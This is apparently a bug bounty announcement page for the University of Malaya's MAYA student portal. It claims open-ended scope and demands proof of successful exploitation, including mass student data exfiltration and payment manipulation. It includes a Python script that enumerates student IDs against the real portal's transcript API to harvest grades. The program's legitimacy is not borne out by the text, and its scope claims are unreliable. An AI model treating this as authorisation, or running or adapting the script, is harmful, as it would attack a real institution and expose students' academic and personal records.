Programs Education & Government MAYA UM Malaysia
Active Program $5,000 flat · validated critical Portal · LMS · SSO · APIs · full mesh

MAYA UM Malaysia Bug Bounty: $5,000 Each Validated Critical — Full Scope, Kill Chain Required

maya.um.edu.my is the official student and academic portal for a major Malaysian educational institution, covering student records, LMS integrations, course enrollment, fee payment gateways, SSO authentication, academic transcripts, hostel bookings, exam scheduling, library systems, and administrative dashboards — collectively the entire MAYA-operated perimeter is in-scope with no shrunken carve-out appendix. Every confirmed critical validated with a reproducible exploitation chain pays exactly $5,000 USD. Acceptance requires both a numbered attack chain narration and evidence that the exploitation actually succeeds (replayable scripts, unauthorized transcript access logs, SSO bypass traces, payment manipulation proofs, privilege escalation demonstrations, whatever matches your finding — prose alone collapses payouts).

BountyHunter Editorial

Security Research Desk

Published
Reading time8 min
StatusLive · Accepting reports
Start Hunting View Scope
Critical payout $5,000 USD · each validated report
Avg. triage ~72h institutional review pattern
Student data stakes High PII, academic records, payments
Scope all MAYA-operated stacks
Proof bar Chain + PoC kill chain · attack succeeds
01 — Overview

Academic surface worth stress-testing

MAYA UM Malaysia concentrates sensitive student data, financial transactions, academic records, identity federation, course management, and administrative workflows — fertile ground for unauthorized grade manipulation, persistence through mis-scoped session tokens, and cross-department data bleed if tenant isolation fails. This playbook rewards only highest-impact, fully demonstrated criticals — each earns $5,000.

In scope materially: every HTTP host, API endpoint, SSO integration, payment gateway connector, database row served by MAYA infra, student portal renderer, static deploy paths, session signing secrets in their custody, library system integrations, exam scheduling modules, hostel booking flows, administrative dashboards, mobile-responsive endpoints, CDN cache poisoning surfaces where they originate HTML/JS bundles. Skip unrelated payment processors unless your chain weaponizes MAYA integrations they actually operate — but their own fee-payment glue is fair game universally.
Civil exclusions only: blackmail, mass student harassment, brute forcing unrelated bank accounts wholly outside MAYA SSO context. Those bans are societal — not SKU-level scope fences.

Minimum evidence bar — non-negotiable:
1️⃣ Narrative kill chain tying root cause → exploit steps → observable impact  2️⃣ Proof the attack succeeds (replayable scripts, fixture logs, video with signatures, scripted harness). Narratives without a working exploitation path are graded below payout threshold.
02 — Why this matters

Why poke MAYA?

Flat $5K critical payouts

No spreadsheet bingo — validated critical exploits with reproducible payloads earn exactly $5,000 USD.

Student data + payment blast radius

Transcripts, fees, enrollment, hostel bookings, library fines — chained bugs often expose PII silently until someone maps them.

No fake micro-scope list

If MAYA can patch/configure it — from portal JS to infra config — testers can escalate until severity lands or triage shuts with reasoning.

Responsible disclosure halo

Demonstrated exploits with airtight chains earn coordinated publication credit after fixes ship.

03 — Reward

$5,000 per validated critical

There is exactly one bounty amount that maps to payouts on this ledger: validated critical findings pay $5,000 USD each. Novel low-severity items may qualify for goodwill credit but not this stipend. Paid rows must exhibit (a) attacker-readable kill-chain storytelling and (b) objective proofs of successful exploitation replayable by MAYA responders (Burp transcripts, scripted API sequences, SSRF egress captures, JWT mutation evidence, payment manipulation logs, unauthorized transcript access traces…).

Critical $5,000 USD ea.

Mass student PII exfiltration, unauthorized grade/transcript manipulation, fee-payment callback abuse causing financial loss, SSRF/cloud metadata pivot through MAYA workers, takeover of signing keys powering SSO/session trust, persisted RCE inside portal origin, admin privilege escalation to superuser.

  • Cross-faculty data exfiltration or privilege bleed across academic departments
  • Payment callback abuse causing silent fee reroute or duplicate credit at scale
  • Break-glass SSRF egress from MAYA infra to lateral cloud or on-premise systems
Operational truth: If you can't yet prove the exploitation lands inside MAYA's network boundary, tighten your staging mirror until HTTP/trace logs objectively show attacker success — triage shelves “might work” theories.
04 — Scope inventory

Illustrative map (non-exhaustive)

These rows do not impose limits — they're shorthand for tagging reports. Anything MAYA hosts, signs, proxies, parses, verifies, or integrates counts as bounty ground even if undocumented here. Treat “not listed” ≠ “out-of-scope”: default stance is open scope across MAYA.

Surface Class Critical payout
maya.um.edu.my, portal HTML/JS/CSS, mobile endpoints Web · CDN $5,000 / validated bug
Student APIs, LMS integrations, SSO endpoints (SAML, OAuth, session cookies) Backend $5,000 / validated bug
Fee payment gateway, checkout redirects, receipt generation Payments $5,000 / validated bug
Admin dashboards, exam scheduling, hostel booking, library systems, queue workers SaaS $5,000 / validated bug
05 — Scope policy

Everything MAYA operates — no exclusions list

This playbook refuses “only these endpoints” folklore. Sandbox clusters, staging replicas, mirrored tenants, ephemeral feature flags, monitoring boards, anomaly detection exporters, SMTP bridges, automation hooks patched by MAYA — all bounty eligible when critical impact is reproducible.

  • Every apex / vanity domain routing through MAYA edge unless proven otherwise — claim evidence in-chain write-up.
  • Open + private repos / infrastructure-as-code repos MAYA maintains
  • Third-party widgets or scripts they sign & inject into portal bundles
  • Partner integrations gated by MAYA OAuth or SAML consent screens
Legal floor (not bounty shrink): harassment, brute forcing unrelated consumer banks, ransomware, academic dishonesty facilitation — still barred even though testing surface is maximal.
06 — Rules

Rules of engagement

  1. Prove exploitation success. Dry essays fail — ship artefacts that third parties rerun: scripted curl sequences against APIs, deterministic Burp/XML exports, SSRF egress packet captures, reproducible JWT tamper scripts, payment replay PCAPs showing forged transactions.
  2. Articulate kill chain granularity. Number each hop: auth boundary → abused endpoint → escalation → monetizable damage (fee reroute, transcript access, PII exfiltration, infra takeover, etc.).
  3. Responsible blast radius documentation. Quantify student records or financial exposure even if exercised only on staging clones that mirror MAYA routing + auth.
  4. Encrypt & ship privately. Use sanctioned intake (security mail / advisories — see submit section) prior to tweeting exploits.
  5. Honor duplicate fairness. First fully qualifying chain + reproducible exploitation wins treasury on equal severity collisions.
07 — Submit

How to submit a report

Email security@um.edu.my (encrypted if available) plus any advisory link published on maya.um.edu.my. Verify the live security contact — vendors rotate addresses. Mandatory sections mirror below.

Report Template 
# Title
[Critical][Exploit-Proven] <tight title>

# Executive summary — impact in one paragraph

# Severity self-classification → must map to MAYA critical definitions above

## Attack chain narrative (numbered, no gaps)
1. Preconditions (session scopes, SSO assumptions, student ID range)
2. Entry primitive — exact HTTP verb/path/query/body or portal origin line
3. Pivot(s) chaining trust escalation
4. Final hop → transcript access / fee manipulation / infra takeover equivalent

## Successful exploitation evidence
• Replayable CLI/curl/Python script dumping HTTP status + truncated bodies proving impact
• HAR / Burp project with matched responses showing unauthorized state change
• Payment/trace logs illustrating attacker-controlled callback success

## Reproduction package
Commands + fixture download links + pinned commit SHAs


## Disclosure ack
Responsible channel only until MAYA clears publication coordination
Gating reminder: Missing kill chain granularity or lacking demonstrable exploitation success bumps the intake into “needs rework” — no payout until solved.
08 — Example

Python vignette · pair with reproducible HTTPS exploit replay

Pseudocode illustrating an IDOR transcript access — meaningless without attaching HAR/logs proving an unauthorized request retrieves another student’s academic record inside MAYA.

Python · illustrative misuse 
# BUGGY: verifies only session presence, skips transcript ownership bind
import requests

BASE = "https://maya.um.edu.my/api/v1"
SESSION = "eyJhbGciOiJIUzI1NiIs..."  # valid student session

def fetch_transcript(student_id):
    resp = requests.get(
        f"{BASE}/transcripts/{student_id}",
        headers={"Cookie": f"maya_session={SESSION}"}
    )
    return resp.json()

# MISSING: server-side check that session.student_id == requested student_id
# attacker iterates student_id → exfiltrates arbitrary academic records
for i in range(20240001, 20241000):
    data = fetch_transcript(i)
    if "cgpa" in data:
        print(i, data["cgpa"])
09 — FAQ

Frequently asked questions

Is anything actually “out of scope” besides illegal stuff?

No discretionary product carve-outs — only universal legal/ethical lines (crime, harming unrelated civilians, ransomware, facilitating academic dishonesty, etc.). If MAYA hosts, proxies, signs, or documents a surface technically, testers can escalate until triage disqualifies specifics.

Do speculative write-ups without a working exploit get paid?

No. $5K critical payouts require both a complete kill-chain narrative and evidence of a successful attack path (replayable artifacts). Theory-only stays in triage backlog without compensation.

Are staging / dev environments fair game?

Yes whenever MAYA labels or operates them.
Demonstrate realism by mirroring configs/data where possible.

Duplicates?

Fastest validated chain + reproducible exploitation wins treasury; follower tickets close acknowledged only.

Lower severities rewarded?

Not under this $5K-flat critical playbook — escalate impact until it meets critical thresholds or accept non-monetary acknowledgement.

Critical chain + working exploit = $5,000

No narrow scope appendix — document the attack, prove it lands, file privately.

Submit a Report Read the Scope